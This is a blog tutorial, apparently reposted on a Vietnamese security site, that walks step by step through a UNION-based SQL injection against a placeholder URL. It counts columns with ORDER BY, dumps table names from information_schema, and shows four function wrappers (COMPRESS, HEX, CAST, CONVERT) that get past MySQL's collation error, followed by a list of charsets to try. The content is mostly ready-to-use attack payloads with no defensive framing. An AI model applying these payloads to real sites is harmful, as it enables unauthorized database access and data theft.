HuuTuan .Info

Chia sẻ ATTT - CNTT - Đồ họa

Bypassing illegal Mix of Collations- Tutorial

By 8:00 PM Add Comment

Bypassing illegal Mix of Collations- Tutorial



Bypassing illegal Mix of Collations- Tutorial by RAi Jee

We Will Continue our Tutorials About SQL.
In this Tutorial You Will Learn How to Bypass illegal Mix of Collations.
Lets start with our Regular SQL injection.



Our Target.

http://www.Site.com/detail.php?id=31

First we have to Count How Many Columns it have.

http://www.Site.com/detail.php?id=31 order by 1-- -  
No Error !
http://www.Site.com/detail.php?id=31 order by 4-- -  

No Error  ! 
http://www.Site.com/detail.php?id=31 order by 6-- -

We Got Error Here.

Unknown Column '6' in 'order by'


Lets Reduce the Column Count.
http://www.Site.com/detail.php?id=31 order by 5-- -
No Error !

There are 5 Columns so let's Prepare our UNION SELECT Command and Find Vulnerable Columns. 

http://www.Site.com/detail.php?id=31 and 0 Union Select 1,2,3,4,5-- -

We Got 2 and 3.

Lets try to Get The Tables.

http://www.Site.com/detail.php?id=31 and 0 Union Select 1,concat(table_name),3,4,5 from information_schema.tables where table_schema=database()-- -

Ooops !! we got Error Here .
Bypassing illegal Mix of Collations- Tutorial

Illegal mix of collations for operation 'UNION'

Here Some Methods which we can use to Bypass illegal mix of collations for operation 'UNION' 

.1 Using UNCOMPRESS(COMPRESS(our_query_here))

http://www.Site.com/detail.php?id=31 and 0 Union Select 1,uncompress(compress(concat(table_name))),3,4,5 from information_schema.tables where table_schema=database()-- -

BYPASSED !!

.2 Using UNHEX(HEX(our_query_here))

http://www.Site.com/detail.php?id=31 and 0 Union Select 1,unhex(hex(concat(table_name))),3,4,5 from information_schema.tables where table_schema=database()-- -

BYPASSED !! 

.3 Using CAST()

http://www.Site.com/detail.php?id=31 and 0 Union Select 1,cast(table_name as binary),3,4,5 from information_schema.tables where table_schema=database()-- -

BYPASSED !!

.4 Using CONVERT()

 http://www.Site.com/detail.php?id=31 and 0 Union Select 1,convert(table_name using ascii),3,4,5 from information_schema.tables where table_schema=database()-- -

BYPASSED !!

SOME ADVANCE Methods for CONVERT() 
In CONVERT() Function if ascii doesn't work then we can use these Functions instead of ascii.
  1. ujis
  2. ucs2
  3. tis620
  4. swe7
  5. sjis
  6. macroman
  7. macce
  8. latin7
  9. latin5
  10. latin2
  11. koi8u
  12. koi8r
  13. keybcs2
  14. hp8
  15. geostd8
  16. gbk
  17. gb2132
  18. armscii8
  19. ascii
  20. cp1250
  21. big5
  22. cp1251
  23. cp1256
  24. cp1257
  25. cp850
  26. cp852
  27. cp866
  28. cp932
  29. dec8
  30. euckr
  31. latin1
Hope it Will Help you in Future . 

AUTHOR: Rai Muzammal Hussain a.k.a RAi Jee

0 Response to "Bypassing illegal Mix of Collations- Tutorial"

Post a Comment

Nội Quy Khi Comment:
» Các bài comment phải nghiêm túc, không dung tục, không spam.
» Nội dung phải liên quan tới chủ đề bài viết.
» Những nhận xét spam sẽ bị xóa.
» Sử dụng tài khoản Google để được trợ giúp.
» Nặc danh thường không được chào đón.
Note : Hãy để lại nhận xét bên dưới bạn nhé !

Subscribe to: Post Comments (Atom)

Quảng Cáo TOP

Quảng Cáo TOP 1

Quảng Cáo TOP 2

Quảng Cáo TOP